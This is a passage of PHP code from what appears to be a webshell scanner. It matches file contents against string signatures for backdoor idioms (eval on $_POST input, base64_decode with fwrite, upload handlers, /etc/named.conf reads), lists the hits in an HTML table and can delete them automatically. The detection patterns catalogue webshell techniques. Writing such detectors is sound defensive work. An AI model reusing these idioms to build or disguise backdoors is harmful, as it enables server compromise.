                        }elseif(strstr($txt, "getcwd") && strstr($txt, 'file_exists') && strstr($txt, '@chdir') && strstr($txt, '@scandir')){
                            $status = 1;
                            $type = '12';
                        }elseif(strstr($txt, '.chr(') && strstr($txt, "@include(") && strstr($txt, "chr(ord($")){
                            $status = 1;
                            $type = '13';
                        }elseif(strstr($txt, 'register_key') && strstr($txt, "kaylin") &&  checkSize($size, 86523)){
                            $status = 1;
                            $type = '14';
                        }elseif((strstr($txt, "base64_decode") || strstr($txt, 'error_reporting')) && strstr($txt, '"display_errors"') && strstr($txt, 'function_exists')){
                            $status = 1;
                            $type = '15';
                        }elseif(strstr($txt, "base64_decode") && strstr($txt, 'fwrite') && strstr($txt, '.php?pass=')){
                            $status = 1;
                            $type = '16';
                        }elseif(strstr($txt, '$_server["\x') && strstr($txt, "serialize")){
                            $status = 1;
                            $type = '17';
                        }elseif(strstr($txt, 'parse_str') && strstr($txt, "<?=") && !strstr($txt, 'highlighter')){
                            $status = 1;
                            $type = '18';
                        }elseif(strstr($txt, 'eval(') && strstr($txt, "foxauto")){
                            $status = 1;
                            $type = '19';
                        }elseif(strstr($txt, 'eval(') && strstr($txt, 'rawurldecode(') && strstr($txt, 'function%20')){
                            $status = 1;
                            $type = '20';
                        }elseif(strstr($txt, '$g($b($c))') && strstr($txt, "_dec") && checkSize($size, 7563)){
                            $status = 1;
                            $type = '21';
                        }elseif(strstr($txt, '$_post[') && strstr($txt, "eval(") && strstr($txt, ";@$") && checkSize($size, 453)){
                            $status = 1;
                            $type = '22';
                        }elseif(strstr($txt, 'filemtime') && strstr($txt, "preg_match('#<") && checkSize($size, 21596)){
                            $status = 1;
                            $type = '23';
                        }elseif(strstr($txt, 'parse_str') && strstr($txt, "eval") && strstr($txt, "'1=%'")){
                            $status = 1;
                            $type = '24';
                        }elseif(strstr($txt, 'php_uname') && strstr($txt, "move_uploaded_file") && checkSize($size, 1133)){
                            $status = 1;
                            $type = '25';
                        }elseif(strstr($txt, 'dehex(') && strstr($txt, "/etc/named.conf") && strstr($txt, '$_files["uploadfile"]')){
                            $status = 1;
                            $type = '26';
                        }elseif(strstr($txt, '?><?php') && strstr($txt, ");$") && strstr($txt, "'}'")){
                            $status = 1;
                            $type = '27';
                        }elseif(strstr($txt, 'function_exists') && strstr($txt, ");@$") && strstr($txt, '.="\x')){
                            $status = 1;
                            $type = '28';
                        }elseif(strstr($txt, '"\1') && strstr($txt, "gettype") && (strstr($txt, ";@$") || strstr($txt, "count"))){
                            $status = 1;
                            $type = '29';
                        }elseif(strstr($txt, "return ''.$") && strstr($txt, '},$') && strstr($txt, '});$')){
                            $status = 1;
                            $type = '30';
                        }elseif(strstr($txt, '"\r\n"') && strstr($txt, '= @$') && strstr($txt, 'new ') && strstr($txt, 'chr($')){
                            $status = 1;
                            $type = '31';
                        }elseif(strstr($txt, 'index.php') && strstr($txt, '@file_put_contents') && strstr($txt, 'xiaoxiannv')){
                            $status = 1;
                            $type = 'xiaoxiannv';
                        }
                    }
                    if($status > 0){
                        $shell .= '<tr><td align="center"><input type="checkbox" name="files[]" value="'.$fullPath.'"></td><td><a href="?path='.escape($fullPath).'&action=edit" target="_blank">'.$fullPath.'</td><td align="center">'.substr(sprintf('%o', fileperms($fullPath)), -4).'</td><td align="center">'.date("Y-m-d H:i:s", filectime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", filemtime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", fileatime($fullPath)).'</td><td align="center">'.round(filesize($fullPath) / 1024, 2).' Kb</td><td align="center">'.$type.'</td></tr>';
                        if($auto == 1 && $status == 1){
                            unlink($fullPath);
                        }
                    }
                }else{
                    // can not read file
                }
            }
        }
    }    
}
?>